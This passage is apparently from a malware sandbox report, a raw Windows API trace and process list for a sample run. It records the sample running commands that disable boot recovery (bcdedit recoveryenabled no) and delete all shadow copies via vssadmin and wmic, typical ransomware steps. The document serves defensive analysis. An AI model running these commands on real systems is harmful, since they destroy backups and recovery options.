halpmcxz\\desktop")) returned 1 [0041.618] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0041.618] GetProcessHeap () returned 0x430000 [0041.618] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44b770 | out: hHeap=0x430000) returned 1 [0041.618] GetEnvironmentStringsW () returned 0x448b00* [0041.618] GetProcessHeap () returned 0x430000 [0041.618] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xae8) returned 0x44acd0 [0041.618] FreeEnvironmentStringsW (penv=0x448b00) returned 1 [0041.618] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0041.618] GetProcessHeap () returned 0x430000 [0041.618] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x431320 | out: hHeap=0x430000) returned 1 [0041.618] GetProcessHeap () returned 0x430000 [0041.618] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4016) returned 0x44cd00 [0041.618] GetProcessHeap () returned 0x430000 [0041.618] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x70) returned 0x44b7c0 [0041.618] GetProcessHeap () returned 0x430000 [0041.618] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44cd00 | out: hHeap=0x430000) returned 1 [0041.618] GetConsoleOutputCP () returned 0x1b5 [0041.619] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0041.619] GetUserDefaultLCID () returned 0x409 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2bf870, cchData=128 | out: lpLCData="0") returned 2 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2bf870, cchData=128 | out: lpLCData="0") returned 2 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2bf870, cchData=128 | out: lpLCData="1") returned 2 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0041.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0041.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0041.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0041.620] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2 [0041.620] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0041.620] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0041.620] GetProcessHeap () returned 0x430000 [0041.620] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20c) returned 0x44b8b0 [0041.621] GetConsoleTitleW (in: lpConsoleTitle=0x44b8b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0041.621] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0041.621] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0041.621] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0041.621] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0041.621] GetProcessHeap () returned 0x430000 [0041.621] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4012) returned 0x44cd00 [0041.621] GetProcessHeap () returned 0x430000 [0041.621] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44cd00 | out: hHeap=0x430000) returned 1 [0041.622] _wcsicmp (_String1="Bcdedit.exe", _String2=")") returned 57 [0041.622] _wcsicmp (_String1="FOR", _String2="Bcdedit.exe") returned 4 [0041.622] _wcsicmp (_String1="FOR/?", _String2="Bcdedit.exe") returned 4 [0041.622] _wcsicmp (_String1="IF", _String2="Bcdedit.exe") returned 7 [0041.622] _wcsicmp (_String1="IF/?", _String2="Bcdedit.exe") returned 7 [0041.622] _wcsicmp (_String1="REM", _String2="Bcdedit.exe") returned 16 [0041.622] _wcsicmp (_String1="REM/?", _String2="Bcdedit.exe") returned 16 [0041.622] GetProcessHeap () returned 0x430000 [0041.622] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb0) returned 0x44bad0 [0041.622] GetProcessHeap () returned 0x430000 [0041.622] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x28) returned 0x444620 [0041.623] GetProcessHeap () returned 0x430000 [0041.623] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x56) returned 0x44bb90 [0041.623] GetConsoleTitleW (in: lpConsoleTitle=0x2bf780, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0041.624] GetFileAttributesW (lpFileName="Bcdedit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bcdedit.exe")) returned 0xffffffff [0041.624] _wcsicmp (_String1="Bcdedit", _String2="DIR") returned -2 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="ERASE") returned -3 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="DEL") returned -2 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="TYPE") returned -18 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="COPY") returned -1 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="CD") returned -1 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="CHDIR") returned -1 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="RENAME") returned -16 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="REN") returned -16 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="ECHO") returned -3 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="SET") returned -17 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="PAUSE") returned -14 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="DATE") returned -2 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="TIME") returned -18 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="PROMPT") returned -14 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="MD") returned -11 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="MKDIR") returned -11 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="RD") returned -16 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="RMDIR") returned -16 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="PATH") returned -14 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="GOTO") returned -5 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="SHIFT") returned -17 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="CLS") returned -1 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="CALL") returned -1 [0041.624] _wcsicmp (_String1="Bcdedit", _String2="VERIFY") returned -20 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="VER") returned -20 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="VOL") returned -20 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="EXIT") returned -3 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="SETLOCAL") returned -17 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="ENDLOCAL") returned -3 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="TITLE") returned -18 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="START") returned -17 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="DPATH") returned -2 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="KEYS") returned -9 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="MOVE") returned -11 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="PUSHD") returned -14 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="POPD") returned -14 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="ASSOC") returned 1 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="FTYPE") returned -4 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="BREAK") returned -15 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="COLOR") returned -1 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="MKLINK") returned -11 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="DIR") returned -2 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="ERASE") returned -3 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="DEL") returned -2 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="TYPE") returned -18 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="COPY") returned -1 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="CD") returned -1 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="CHDIR") returned -1 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="RENAME") returned -16 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="REN") returned -16 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="ECHO") returned -3 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="SET") returned -17 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="PAUSE") returned -14 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="DATE") returned -2 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="TIME") returned -18 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="PROMPT") returned -14 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="MD") returned -11 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="MKDIR") returned -11 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="RD") returned -16 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="RMDIR") returned -16 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="PATH") returned -14 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="GOTO") returned -5 [0041.625] _wcsicmp (_String1="Bcdedit", _String2="SHIFT") returned -17 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="CLS") returned -1 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="CALL") returned -1 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="VERIFY") returned -20 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="VER") returned -20 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="VOL") returned -20 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="EXIT") returned -3 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="SETLOCAL") returned -17 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="ENDLOCAL") returned -3 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="TITLE") returned -18 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="START") returned -17 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="DPATH") returned -2 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="KEYS") returned -9 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="MOVE") returned -11 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="PUSHD") returned -14 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="POPD") returned -14 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="ASSOC") returned 1 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="FTYPE") returned -4 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="BREAK") returned -15 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="COLOR") returned -1 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="MKLINK") returned -11 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="FOR") returned -4 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="IF") returned -7 [0041.626] _wcsicmp (_String1="Bcdedit", _String2="REM") returned -16 [0041.627] GetProcessHeap () returned 0x430000 [0041.627] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x218) returned 0x44bbf0 [0041.627] GetProcessHeap () returned 0x430000 [0041.627] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x6e) returned 0x44be10 [0041.627] _wcsnicmp (_String1="Bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0041.627] GetProcessHeap () returned 0x430000 [0041.627] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x420) returned 0x431320 [0041.627] SetErrorMode (uMode=0x0) returned 0x0 [0041.627] SetErrorMode (uMode=0x1) returned 0x0 [0041.627] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x431330, lpFilePart=0x2bf010 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2bf010*="Desktop") returned 0x25 [0041.627] SetErrorMode (uMode=0x0) returned 0x1 [0041.627] GetProcessHeap () returned 0x430000 [0041.627] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x431320, Size=0x74) returned 0x431320 [0041.627] GetProcessHeap () returned 0x430000 [0041.627] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x431320) returned 0x74 [0041.627] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0041.628] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0041.628] GetProcessHeap () returned 0x430000 [0041.628] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x128) returned 0x44be90 [0041.628] GetProcessHeap () returned 0x430000 [0041.628] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x240) returned 0x44bfc0 [0041.633] GetProcessHeap () returned 0x430000 [0041.633] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x44bfc0, Size=0x12a) returned 0x44bfc0 [0041.633] GetProcessHeap () returned 0x430000 [0041.633] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x44bfc0) returned 0x12a [0041.633] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.633] GetProcessHeap () returned 0x430000 [0041.633] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe8) returned 0x44c100 [0041.633] GetProcessHeap () returned 0x430000 [0041.633] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x44c100, Size=0x7e) returned 0x44c100 [0041.633] GetProcessHeap () returned 0x430000 [0041.633] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x44c100) returned 0x7e [0041.634] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.634] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x2bed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed80) returned 0xffffffffffffffff [0041.634] GetLastError () returned 0x2 [0041.634] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x2bed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed80) returned 0xffffffffffffffff [0041.634] GetLastError () returned 0x2 [0041.634] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x2bed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed80) returned 0xffffffffffffffff [0041.634] GetLastError () returned 0x2 [0041.634] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.635] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\Bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x2bed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bed80) returned 0x44c190 [0041.635] GetProcessHeap () returned 0x430000 [0041.635] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x28) returned 0x444650 [0041.635] FindClose (in: hFindFile=0x44c190 | out: hFindFile=0x44c190) returned 1 [0041.635] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0041.635] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0041.635] GetConsoleTitleW (in: lpConsoleTitle=0x2bf2d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0041.669] InitializeProcThreadAttributeList (in: lpAttributeList=0x2bf088, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2bf048 | out: lpAttributeList=0x2bf088, lpSize=0x2bf048) returned 1 [0041.669] UpdateProcThreadAttribute (in: lpAttributeList=0x2bf088, dwFlags=0x0, Attribute=0x60001, lpValue=0x2bf038, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2bf088, lpPreviousValue=0x0) returned 1 [0041.669] GetStartupInfoW (in: lpStartupInfo=0x2bf1a0 | out: lpStartupInfo=0x2bf1a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0041.669] GetProcessHeap () returned 0x430000 [0041.669] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x20) returned 0x444680 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0041.669] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0041.670] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0041.670] GetProcessHeap () returned 0x430000 [0041.670] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x444680 | out: hHeap=0x430000) returned 1 [0041.670] GetProcessHeap () returned 0x430000 [0041.670] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x4489a0 [0041.670] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0041.672] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="Bcdedit.exe /set {default} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2bf0c0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="Bcdedit.exe /set {default} recoveryenabled no", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2bf070 | out: lpCommandLine="Bcdedit.exe /set {default} recoveryenabled no", lpProcessInformation=0x2bf070*(hProcess=0x54, hThread=0x50, dwProcessId=0xb94, dwThreadId=0xb98)) returned 1 [0041.907] CloseHandle (hObject=0x50) returned 1 [0041.907] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0041.907] GetProcessHeap () returned 0x430000 [0041.907] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44acd0 | out: hHeap=0x430000) returned 1 [0041.907] GetEnvironmentStringsW () returned 0x44acd0* [0041.907] GetProcessHeap () returned 0x430000 [0041.907] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xae8) returned 0x448b00 [0041.907] FreeEnvironmentStringsW (penv=0x44acd0) returned 1 [0041.907] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0042.157] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2befb8 | out: lpExitCode=0x2befb8*=0x0) returned 1 [0042.157] CloseHandle (hObject=0x54) returned 1 [0042.157] _vsnwprintf (in: _Buffer=0x2bf228, _BufferCount=0x13, _Format="%08X", _ArgList=0x2befc8 | out: _Buffer="00000000") returned 8 [0042.157] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0042.157] GetProcessHeap () returned 0x430000 [0042.157] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448b00 | out: hHeap=0x430000) returned 1 [0042.157] GetEnvironmentStringsW () returned 0x44c190* [0042.157] GetProcessHeap () returned 0x430000 [0042.157] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb0e) returned 0x448b00 [0042.157] FreeEnvironmentStringsW (penv=0x44c190) returned 1 [0042.157] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0042.157] GetProcessHeap () returned 0x430000 [0042.157] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448b00 | out: hHeap=0x430000) returned 1 [0042.157] GetEnvironmentStringsW () returned 0x44c190* [0042.157] GetProcessHeap () returned 0x430000 [0042.157] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb0e) returned 0x448b00 [0042.157] FreeEnvironmentStringsW (penv=0x44c190) returned 1 [0042.157] GetProcessHeap () returned 0x430000 [0042.158] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4489a0 | out: hHeap=0x430000) returned 1 [0042.158] DeleteProcThreadAttributeList (in: lpAttributeList=0x2bf088 | out: lpAttributeList=0x2bf088) [0042.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.158] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0042.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.158] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1 [0042.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0042.158] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1 [0042.158] SetConsoleInputExeNameW () returned 0x1 [0042.158] GetConsoleOutputCP () returned 0x1b5 [0042.158] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0042.158] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0042.159] exit (_Code=0) Process: id = "5" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x49c74000" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xaf8" cmd_line = "vssadmin.exe delete shadows /all /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 14 os_tid = 0xb38 Thread: id = 15 os_tid = 0xb4c Thread: id = 18 os_tid = 0xb64 Thread: id = 19 os_tid = 0xb68 Thread: id = 20 os_tid = 0xb6c Process: id = "6" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x48c4b000" os_pid = "0xb50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xb10" cmd_line = "WMIC.exe shadowcopy delete " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 